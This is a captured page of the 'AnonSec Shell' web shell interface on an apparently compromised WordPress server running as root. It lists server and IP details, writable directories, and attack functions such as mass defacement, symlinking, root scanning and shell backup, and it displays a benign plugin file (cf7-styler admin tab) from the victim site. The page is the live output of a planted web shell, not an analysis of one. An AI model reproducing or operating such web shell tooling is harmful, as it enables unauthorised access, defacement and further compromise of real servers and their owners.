AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 3.142.245.40   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/cf7-styler/admin/partials/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/cf7-styler/admin/partials//cf7-customizer-admin-tab-required-plugin.php
<?php
$required_plugins = Cf7_Required_Plugin::get_required_plugins();
$plugin_url = untrailingslashit( plugins_url( '/', CF7CSTMZR_PLUGIN_FILE ) );

if (!empty($required_plugins)) {
    ?>
    <div style="width100%; max-width: 650px; margin: auto;">
        <p>
            <?php _e('Before using WOW Style Contact Form 7, you need to install and activate Contact Form 7 plugin.', 'cf7-styler'); ?>
        </p>

        <div class="processing-holder">
            <div class="required-plugin-container">
                <?php
                foreach ($required_plugins as $slug => $data) {
                    $plugin_installed = Cf7_Required_Plugin::is_plugin_installed($data['slug']);
                    ?>
                    <div class="required-plugin-holder">
                        <div class="required-plugin-holder-inner">
                            <div class="img-holder">
                                <img src="<?php echo $plugin_url . '/admin/img/icon-'.$slug.'.png'; ?>" alt="">
                            </div>

                            <div class="info-holder">
                                <h3><a href="<?php echo $data['link'] ?>" target="_blank"><?php echo $data['label'] ?></a></h3>
                                <p><?php echo $data['author'] ?></p>
                                <?php
                                if (!empty($data['notice'])) {
                                    echo $data['notice'];
                                }
                                ?>
                            </div>

                            <div class="button-holder">
                                <button id="install-<?php echo $slug ?>" class="cf7cstmzr-install-plugin button button-primary" data-plugin="<?php echo $slug ?>">
                                    <?php _e('Install and Activate', 'more-better-reviews-for-woocommerce'); ?>
                                </button>
                            </div>
                        </div>
                    </div>
                    <?php
                }
                ?>
            </div>

            <div class="processing-spinner-holder">
                <div class="processing-spinner"></div>
            </div>
        </div>
    </div>
    <?php
}

Anon7 - 2022
AnonSec Team